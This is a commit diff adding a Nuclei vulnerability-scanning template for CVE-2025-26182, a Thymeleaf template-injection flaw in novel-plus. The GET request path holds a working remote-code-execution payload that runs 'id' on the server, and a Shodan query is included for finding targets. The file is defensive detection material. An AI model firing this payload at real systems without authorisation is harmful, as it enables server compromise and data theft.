add CVE-2025-26182

http/cves/2025/CVE-2025-26182.yaml

@@ -0,0 +1,53 @@
+id: CVE-2025-26182
+
+info:
+  name: xxyopen novel-plus - Server-Side Template Injection
+  author: pdteam
+  severity: critical
+  description: |
+    xxyopen novel-plus v.4.4.0 and earlier contains a remote code execution vulnerability caused by Server-Side Template Injection in PageController.java. The vulnerability allows remote attackers to execute arbitrary code through unvalidated path parameters that are directly inserted into Thymeleaf template rendering.
+  impact: |
+    Remote attackers can execute arbitrary code on the server, potentially leading to full system compromise including data theft, system manipulation, and lateral movement within the network.
+  remediation: |
+    Update to the latest version of xxyopen novel-plus that addresses this vulnerability.
+  reference:
+    - https://gist.github.com/GSBP0/007355c5f6bd213264ae1c35c347e5cc
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-26182
+    - https://github.com/201206030/novel-plus
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2025-26182
+    cwe-id: CWE-94
+    epss-score: 0.00117
+    epss-percentile: 0.31304
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: title:"novel-plus"
+  tags: cve,cve2025,ssti,rce,novel-plus,thymeleaf
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(\"id\").getInputStream()).next()}__::.x.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "uid="
+          - "gid="
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "uid=([0-9]+\\([^)]+\\))"